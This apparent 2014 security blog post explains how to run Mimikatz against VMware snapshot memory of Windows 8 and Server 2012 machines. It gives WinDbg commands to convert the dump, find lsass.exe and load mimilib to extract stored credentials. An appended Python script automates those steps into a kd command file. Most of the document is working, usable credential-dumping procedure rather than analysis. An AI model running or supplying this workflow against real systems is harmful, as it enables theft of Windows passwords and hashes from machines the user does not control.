Friday, June 13, 2014

Mimikatz Against Virtual Machine Memory Part 2

Short update, mostly about performing the actions from Part 1 on Windows 8+ and Windows Server 2012.


First issue was symbols in WinDbg. Most importantly, NO symbols for WinDbg. I found this article that lets you download them remotely:

http://support.microsoft.com/kb/311503

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols


0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
..............
Loading User Symbols

Loading unloaded module list
.........


Second issue was creating the .dmp file. I tried Volatility's imagecopy and the Windows Memory Toolkit. Neither produced a dump file that would work with WinDbg for Windows 8 or Windows Server 2012. What did work was VMware's vmss2core utility.

Note: for VMware Workstation/Fusion you need to pass it both the .vmsn and the .vmem files (shown above). A .vmss from a suspended VM works the same way as the .vmsn from a snapshot.

For VMware ESXi I just needed to pass the .vmsn file.

The rest follows the same flow as the previous post:

1. Load the memory.dmp file vmss2core created.

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe


5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................



6. Run Mimikatz

kd> !mimikatz


7. Drink Beers
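Steps 2 through 6 are the same every time, so they can be scripted instead of typed. The Python below is an added example and not code from the original post or from the mimikatz project: it parses the text that `!process 0 0` (or `!process 0 0 lsass.exe`) prints, pulls out the EPROCESS address for lsass.exe, and writes the debugger commands above into a kd command file. The sample `!process` output is constructed (the lsass block mirrors the one above; the System block and the backtick in its address are made up to exercise the parser). The kd.exe flags used (`-z` to open a dump, `-c` to run a startup command, `$<` to run a command file) are as I know them, so check `kd -?` locally. Step 1 still happens outside the debugger; as far as I recall vmss2core's usage text, `-W8` is its Windows 8/Server 2012 full-dump mode, but confirm that against the tool's own help.

```python
"""Generate a kd/WinDbg command file for the lsass + mimilib workflow.

Added example, not code from the original post.  It automates steps 2-6:
parse the output of `!process 0 0` (or `!process 0 0 lsass.exe`), pull out the
EPROCESS address of lsass.exe, and emit the exact debugger commands the post
types by hand, so the whole run can be driven from a kd.exe command line.
"""
import re
from pathlib import Path

# Constructed sample of `!process 0 0` output (all processes, two shown).  The
# lsass block mirrors the one in the post; the System block and the backtick
# in its address are made up to exercise the parser.
SAMPLE_PROCESS_OUTPUT = """\
PROCESS ffffe001`12c48040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001aa000  ObjectTable: ffffc001f7a01000  HandleCount: 1021
    Image: System

PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount: 1180
    Image: lsass.exe
"""

SYMBOL_SERVER = "http://msdl.microsoft.com/download/symbols"


def parse_process_list(text):
    """Return one dict per PROCESS block: {'address', 'cid', 'image'}.

    Addresses are normalised to lowercase hex without the ` separator that
    WinDbg inserts into 64-bit values, so they can be pasted into .process.
    """
    procs, current = [], None
    for line in text.splitlines():
        m = re.match(r"^PROCESS\s+([0-9a-fA-F`]+)", line)
        if m:
            current = {"address": m.group(1).replace("`", "").lower(),
                       "cid": None, "image": None}
            procs.append(current)
            continue
        if current is None:
            continue  # ignore any banner text before the first block
        m = re.search(r"\bCid:\s*([0-9a-fA-F]+)", line)
        if m:
            current["cid"] = int(m.group(1), 16)
        m = re.match(r"^\s*Image:\s*(\S+)", line)
        if m:
            current["image"] = m.group(1)
    return procs


def find_processes(text, image="lsass.exe"):
    """Filter parsed blocks by image name (case-insensitive)."""
    return [p for p in parse_process_list(text)
            if (p["image"] or "").lower() == image.lower()]


def build_kd_script(addresses, symbol_cache=r"f:\localsymbols",
                    mimilib=r"C:\users\user\desktop\mimilib.dll"):
    """Emit the debugger commands from steps 2-6 as a kd command file.

    One `.process /r /p` + `!mimikatz` pair per address, so a dump with more
    than one matching process (unusual for lsass) is handled too.  Ends with
    `q` so kd exits when run non-interactively.
    """
    lines = [
        f".sympath SRV*{symbol_cache}*{SYMBOL_SERVER}",
        ".reload",
        f".load {mimilib}",
    ]
    for addr in addresses:
        lines += [f".process /r /p {addr}", "!mimikatz"]
    lines.append("q")
    return "\n".join(lines) + "\n"


def kd_command_line(dump_path, script_path):
    """Command to run the script against the dump.

    -z opens a crash dump, -c runs a command string at startup, and $< runs
    the commands in a file (assumed kd.exe flags, check `kd -?` locally).
    """
    return f'kd.exe -z "{dump_path}" -c "$<{script_path}"'


if __name__ == "__main__":
    lsass = find_processes(SAMPLE_PROCESS_OUTPUT)
    script = build_kd_script([p["address"] for p in lsass])
    Path("mimikatz.kd").write_text(script)
    print(script)
    print(kd_command_line(r"C:\dumps\memory.dmp", r"C:\dumps\mimikatz.kd"))
```

In practice you run kd once with `!process 0 0 lsass.exe` to capture the text, feed it to `find_processes`, then launch the generated command file against the same dump; the `.reload` after `.sympath` is what actually pulls the kernel symbols from the server, and without it `!process` has nothing to walk.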